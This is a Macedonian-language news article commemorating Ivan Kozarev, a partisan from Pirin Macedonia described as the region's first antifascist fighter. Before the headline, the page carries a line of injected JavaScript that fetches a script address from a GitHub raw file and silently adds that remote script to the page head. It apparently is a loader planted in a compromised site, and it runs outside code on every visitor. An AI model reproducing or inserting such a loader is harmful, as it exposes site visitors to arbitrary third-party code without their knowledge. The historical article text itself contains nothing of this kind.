;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Козарев - Заборавениот симбол на антифашистичката борба во Пиринска Македонија - Антропол
АктуелноЛокалноОгледало

Козарев – Заборавениот симбол на антифашистичката борба во Пиринска Македонија

Козарев бил револуционер уште во 1925 година како член на ВМРО Обединета, го прогонувале џелатите и следбениците на Ванчо Михајлов, за во 1941 година, уште пред да почне НОВ да убие двајца бугарски жандарми и со тоа да стане првиот партизан во Македонија и на Балканот. Македонија го заборави Иван Козарев, кој бил роден во селото Добриништа, Банско на денешен пред 122 години, се сеќава здружението ОМО Илинден Пирин во пост на социјалните мрежи.

Козарев всушност им давал отпор на бугарските жандарми кои имале налог да го уапсат, па ги убил. Во ова време Македнија веќе била под бугарска окупација. Настанот се случува во јуни 1941 година, уште пред да пукне првата пушка во Југославија, односно пред српското востание. Само пет дена претходно Хитлер го нападнал СССР.

Заедно со неговиот другар од затвор, Никола Парапунов, во Разлошко ја формираат првата партизанска чета во Пиринска Македонија. Козарев го добива прекарот Балкан. Бил прочуен како добар стрелец и станал познат по својата ладнокрвност и храброст. Неговото име станало симбол на македонскиот отпор против фашизмот во Пиринска Македонија.

Од ОМО Илинден Пирин велат дека македонските деца погрешно учат дека првата пушка во Југославија пукнала кога Србинот Жикица Јовановиќ – Шпанац убива двајца жандарми во местото Бела Црква, кога на него му претходи храброста на Козарев наречен Балкан.

Козарев постанува трн во окото на бугарската фашистичка полиција. Три години предводел напади и диверзантски акции против бугарската фашистичка војска и полиција и никогаш не успеале да го фатат. Пред војната, претходно неколку пати Бугарите го затворале, а со Парапунов лежеле во затвор од 1935 до 1938 година.

Уште во 1939 година била одржана Конференција за поврзување на македонското движење во Пирин со другите делови.

Козарев умира во неразјаснети околности на 1 април во 1944 година. Се смета дека во близина на родното Добриниште, кога се движел кон местото каде биле собрани партизаните неговиот соборев Александар Пицин не го препознал во мракот и пукал во него.